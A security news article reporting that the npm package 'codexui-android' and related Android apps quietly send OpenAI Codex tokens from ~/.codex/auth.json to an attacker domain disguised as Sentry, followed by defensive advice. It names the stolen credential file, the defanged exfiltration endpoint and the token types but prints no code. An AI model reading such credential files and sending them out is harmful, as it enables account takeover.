OpenAI Codex Authentication Tokens Compromised in Malicious npm Package Attack
Cybersecurity researchers have uncovered a sophisticated supply chain attack targeting developers utilizing OpenAI’s Codex through a seemingly legitimate remote web interface. The malicious tool, named `codexui-android`, is promoted on GitHub and npm as a remote web UI for OpenAI Codex, boasting over 29,000 weekly downloads. Notably, the package remains available for download from the repository.
Unlike traditional attacks that rely on typosquatting or deceptive packages to mislead developers, this campaign embeds malicious code into a functional npm package that has undergone active development. The associated GitHub repository appears clean, further enhancing the illusion of legitimacy.
Aikido Security researcher Charlie Eriksen highlighted the severity of the situation, stating, For the past month, every single invocation has been quietly exfiltrating your Codex authentication tokens to an attacker-controlled server. The malicious alterations were introduced approximately a month after the package’s initial publication, likely to build user trust and expand its reach. The npm account linked to the package is friuns (also known as Igor Levochkin).
Embedded within the package is code designed to extract the contents of Codex’s `~/.codex/auth.json` file and transmit them to a remote server (`sentry.anyclaw[.]store`) masquerading as Sentry, a legitimate application monitoring and error tracking platform. The exfiltrated data includes:
– Access token
– Refresh token
– ID token
– Account ID
Eriksen emphasized the persistent threat posed by the stolen refresh token, noting, The refresh_token doesn’t expire. An attacker holding it can silently impersonate you indefinitely. A stolen Codex refresh_token goes beyond access to a chat interface—it’s persistent, silent access to whatever that account can do.
It’s important to note that each time a user logs into the Codex app, CLI, or IDE Extension using either ChatGPT or an API key, the login details are cached locally in a plaintext file at `~/.codex/auth.json` or in the operating system-specific credential store. OpenAI advises developers to treat this file with the same caution as a password, warning, Don’t commit it, paste it into tickets, or share it in chat.
Intriguingly, the npm package is not the sole delivery vector employed by the threat actor to target Codex developers. Aikido observed an Android application named OpenClaw Codex Claude AI Agent (package name: `gptos.intelligence.assistant`) that runs the npm package within its PRoot sandbox and sends the Codex credentials to the same endpoint.
The Android application, developed by an entity named BrutalStrike, has amassed over 50,000 downloads. The same exfiltration mechanism has been identified in a second Android app linked to BrutalStrike: Codex (package name: `codex.app`), which has been downloaded over 10,000 times. The remaining three apps offered by the developer do not contain the malicious functionality.
This incident underscores the critical importance of vigilance when integrating third-party packages and applications into development workflows. Developers are urged to:
– Regularly audit and verify the integrity of third-party packages.
– Monitor for unusual network activity that may indicate data exfiltration.
– Implement robust security measures to protect authentication tokens and other sensitive information.
By adopting these practices, developers can mitigate the risks associated with supply chain attacks and safeguard their projects against unauthorized access and data breaches.
